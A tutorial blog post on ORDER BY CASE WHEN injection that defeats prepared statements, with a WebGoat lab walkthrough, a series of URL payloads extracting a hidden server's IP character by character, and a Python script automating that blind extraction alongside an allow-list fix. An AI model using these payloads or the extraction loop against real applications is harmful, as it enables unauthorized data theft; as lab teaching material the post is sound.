SQL injection - precompiled CASE injection

Precompiled CASE injection

CASE is a conditional expression in a database query language such as SQL: it evaluates a condition and yields one of several values, much like a switch statement in a programming language. The "precompiled CASE injection" described on this page is an SQL injection attack in which a CASE WHEN expression is injected into a query that otherwise uses precompiled (prepared) statements, typically through an ORDER BY clause whose column name is still concatenated into the SQL text.

The principle is the same as for other injection attacks: the attacker constructs input that passes the application's validation and filtering, reaches the SQL text unchanged, and alters the meaning of the statement, so that unauthorized operations can be performed or sensitive information obtained.

In a precompiled CASE injection, the attacker targets a query whose sort or conditional logic is built from user input. By supplying a malicious conditional expression, the attacker makes the query's observable result (here, its sort order) depend on a condition of the attacker's choosing, which turns the query into a true/false oracle for data the application never displays.

1. SQL injection vulnerability defense

  • Avoid building SQL statements by string concatenation (splicing); use precompilation (prepared statements with bound parameters) and similar techniques.

  • Strictly validate the parameters that enter an SQL statement; where a value must become part of the statement text itself (such as a column name), check it against an allow-list rather than filtering characters.

  • Deploy security devices such as a WAF (web application firewall).

  • Many current development frameworks (ORMs, query builders) bind parameters automatically and have largely solved SQL injection for values at the technical level; they still do not protect identifiers such as column names that the code concatenates into the query.

In Java, PreparedStatement is the interface for precompiled statements; it extends Statement.

The role of PreparedStatement: precompile an SQL statement and execute it with bound parameters, which prevents SQL injection through those parameters.

PreparedStatement benefits:

  • The SQL is precompiled once and can be executed many times with different parameters, giving higher performance.
  • Prevents SQL injection: parameter values are passed separately from the SQL text (or escaped by the driver when prepared statements are emulated on the client side), so a value cannot change the structure of the statement.

image-20210725195756848

The process by which Java code operates on the database is shown in the figure:

  • The Java code sends the SQL statement to the MySQL server.

  • The MySQL server processes the SQL statement:

    • It checks the SQL statement and verifies that its syntax is correct.

    • It compiles the SQL statement into an executable plan.

      Checking and compiling the SQL take longer than executing it.

      If only the parameters are reset, the statement does not need to be checked and compiled again, which improves performance.

    • It executes the SQL statement.

As the saying goes, there is no absolute security. Precompilation does not eliminate SQL injection on its own: it protects the values bound to parameter placeholders, but not the parts of a statement that placeholders cannot express and that the code therefore still concatenates.

For example, parameter binding can be bypassed in the following way: ORDER BY takes an expression, not a value, so a sort column usually has to be concatenated into the SQL text. Using a CASE WHEN expression, a SELECT statement can be embedded in the order expression after ORDER BY.

The prerequisite is that the SQL statement has an ORDER BY whose column comes from user input and is spliced into the statement; only then can precompiled CASE injection be used.

2. WEBGOAT SQL injection

2.1 WebGoat 8.0

Download address: https://github.com/WebGoat/WebGoat/wiki
WebGoat official website and usage: https://github.com/WebGoat/WebGoat

Run WebGoat

Execute: java -jar webgoat-server-8.0.0.M21.jar

image-20230924145350643

Then open http://127.0.0.1:8080/WebGoat in the browser, register a user, and log in to start using WebGoat.

2.2 Order by injection

Start the lab and open the lesson page

image-20230924130939131

The task is to obtain the IP address of the server whose hostname is webgoat-prd, and the lesson states that the Submit field itself has no SQL injection.

WebGoat's hint suggests using a WHEN condition of the form when (true/false).

image-20230924135135373

Use Burp Suite (bp) to capture the request: click the IP column header to sort, and intercept the request that is sent.

image-20230924145029497

View the captured request

image-20230924132252948

Sort by different columns

  • Sort by IP:

image-20230924132411561

  • Sort by hostname:

image-20230924132442557

Think of the value of the column parameter as the ORDER BY argument in the SQL statement.

The column parameter is attacker-controlled, so we can send an arbitrary value and inspect what the browser returns.

image-20230924132713555

An error message is returned

image-20230924132843911

Looking closely at the error message, the SQL statement appears in it:

select id, hostname, ip, mac, status, description from servers where status <> 'out of order' order by wuhu

The value wuhu passed in column ends up as the ORDER BY argument. The error also leaks a lot of database information: the columns id, hostname, ip, mac, status, description; the table name servers; and the fact that the query only returns rows whose status is not 'out of order'. It can be inferred that the server named webgoat-prd has status 'out of order', which is why a normal query never shows it.

Using CASE WHEN for injection, the whole SQL statement becomes:

select id, hostname, ip, mac, status, description from servers where status <> 'out of order' order by case when (true/false) then hostname else id end 

Note: if the condition in WHEN is true, the result is sorted by hostname, otherwise by id.

Note:

  • The column names after THEN and ELSE must be real columns of the query, otherwise the SQL statement returns an error.
  • The CASE expression must be closed with END.

2.2.1 Constructing the WHEN condition

Get the IP address of the server with hostname webgoat-prd:

select ip from servers where hostname='webgoat-prd'

Determine whether the first character is 1:

substring((select ip from servers where hostname='webgoat-prd'),1,1)=1

The SUBSTRING function extracts a substring from a string; SUBSTRING(s, 1, 1) is the first character of s.

Put the whole condition into WHEN; the full URL is:

127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when (substring((select ip from servers where hostname='webgoat-prd'),1,1)=1) then hostname else id end)

Then URL-encode the constructed parameter and send the request. The results come back sorted by hostname, which means the first character of the IP address is 1.

image-20230924135534378

The second character is 0

image-20230924140954214

The third character is 4

image-20230924141038591

The full set of requests whose condition is true, one per character of the IP address:

Note: these cannot be pasted into Burp as-is; the parameter must be URL-encoded first.

127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,1,1) from servers where hostname='webgoat-prd')=1) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,2,1) from servers where hostname='webgoat-prd')=0) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,3,1) from servers where hostname='webgoat-prd')=4) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,4,1) from servers where hostname='webgoat-prd')='.') then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,5,1) from servers where hostname='webgoat-prd')=1) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,6,1) from servers where hostname='webgoat-prd')=3) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,7,1) from servers where hostname='webgoat-prd')=0) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,8,1) from servers where hostname='webgoat-prd')='.') then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,9,1) from servers where hostname='webgoat-prd')=2) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,10,1) from servers where hostname='webgoat-prd')=1) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,11,1) from servers where hostname='webgoat-prd')=9) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,12,1) from servers where hostname='webgoat-prd')='.') then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,13,1) from servers where hostname='webgoat-prd')=2) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,14,1) from servers where hostname='webgoat-prd')=0) then hostname else id end)
127.0.0.1:8888/WebGoat/SqlInjection/servers?column=(case when ((select substring(ip,15,1) from servers where hostname='webgoat-prd')=2) then hostname else id end)

Combining the characters, the IP address is 104.130.219.202

Finally, enter the obtained IP address into the page to complete the lesson.

image-20230924143130613

2.2.2 Code audit

Locating the file Servers.java and analyzing the source code, we can see that although the server uses a precompiled statement, it still splices the order by parameter column into the SQL text, resulting in an SQL injection vulnerability:

image-20230924143354707
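The vulnerable pattern from the code audit, the character-by-character extraction from 2.2.1, and the allow-list fix from the defense section can all be exercised in one place. The following is an added example, not WebGoat's code and not from the original post: it is a Python script that rebuilds the servers table in an in-memory SQLite database (constructed sample rows, with the webgoat-prd IP taken from the result on this page), concatenates the ORDER BY argument exactly as Servers.java does, uses the resulting sort order as a true/false oracle, and shows the hardened version rejecting the payload. SQLite stands in for WebGoat's HSQLDB, so substr() is used and the extracted character is compared as a string; the function names and sample data are this example's own assumptions.

```python
import sqlite3

# Constructed sample data modelled on the 'servers' table leaked by the error
# message on this page; the webgoat-prd IP is the value the page recovers.
SAMPLE_SERVERS = [
    (1, "webgoat-dev", "192.168.3.14", "AA:BB:CC:DD:EE:01", "online", "dev"),
    (2, "webgoat-acc", "192.168.3.15", "AA:BB:CC:DD:EE:02", "online", "acc"),
    (3, "webgoat-tst", "192.168.3.16", "AA:BB:CC:DD:EE:03", "online", "tst"),
    (4, "webgoat-prd", "104.130.219.202", "AA:BB:CC:DD:EE:04", "out of order", "prd"),
]

# Allow-list for the sort column: identifiers cannot be bound with '?'.
ALLOWED_COLUMNS = {"id", "hostname", "ip", "mac", "status", "description"}


def make_db():
    """In-memory SQLite stand-in for WebGoat's HSQLDB (assumption of this example)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table servers (id integer, hostname text, ip text, "
               "mac text, status text, description text)")
    db.executemany("insert into servers values (?,?,?,?,?,?)", SAMPLE_SERVERS)
    return db


def list_servers_vulnerable(db, column):
    """The pattern seen in Servers.java: the WHERE value is bound as a parameter,
    but the ORDER BY argument is concatenated, so the caller controls the sort
    expression and can embed a CASE WHEN with a subquery in it."""
    sql = ("select id, hostname, ip, mac, status, description from servers "
           "where status <> ? order by " + column)
    return db.execute(sql, ("out of order",)).fetchall()


def list_servers_safe(db, column):
    """Hardened form: check the requested column against the allow-list and
    only then concatenate the (now known-good) identifier."""
    if column not in ALLOWED_COLUMNS:
        raise ValueError(f"unsupported sort column: {column!r}")
    sql = ("select id, hostname, ip, mac, status, description from servers "
           "where status <> ? order by " + column)
    return db.execute(sql, ("out of order",)).fetchall()


def sorted_by_hostname(db, payload):
    """Boolean oracle: the injected CASE sorts by hostname when its condition is
    true and by id otherwise, and the two orders put different rows first."""
    rows = list_servers_vulnerable(db, payload)
    return rows == sorted(rows, key=lambda r: r[1])


def case_payload(pos, ch):
    """Same shape as the page's column parameter; the character is compared as
    a string because SQLite's substr() returns text."""
    return ("(case when ((select substr(ip,%d,1) from servers "
            "where hostname='webgoat-prd')='%s') then hostname else id end)"
            % (pos, ch))


def extract_ip(db, alphabet="0123456789."):
    """Recover the filtered-out row's IP one character at a time; stop when no
    candidate matches, because substr() past the end of the string yields ''."""
    ip = ""
    pos = 1
    while True:
        for ch in alphabet:
            if sorted_by_hostname(db, case_payload(pos, ch)):
                ip += ch
                break
        else:
            return ip
        pos += 1


if __name__ == "__main__":
    db = make_db()
    print("hidden row recovered via ORDER BY oracle:", extract_ip(db))
    try:
        list_servers_safe(db, case_payload(1, "1"))
    except ValueError as e:
        print("hardened version rejected payload:", e)
```

Running the script prints 104.130.219.202 without ever selecting the 'out of order' row directly: every request returns only the three visible servers, and the information leaks purely through which order they come back in. Note that binding the column with a '?' placeholder would not be a fix either, since the database would then sort by a constant string; the allow-list in list_servers_safe is the correct repair for an identifier that must end up in the statement text.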


Origin blog.csdn.net/weixin_58783105/article/details/133271537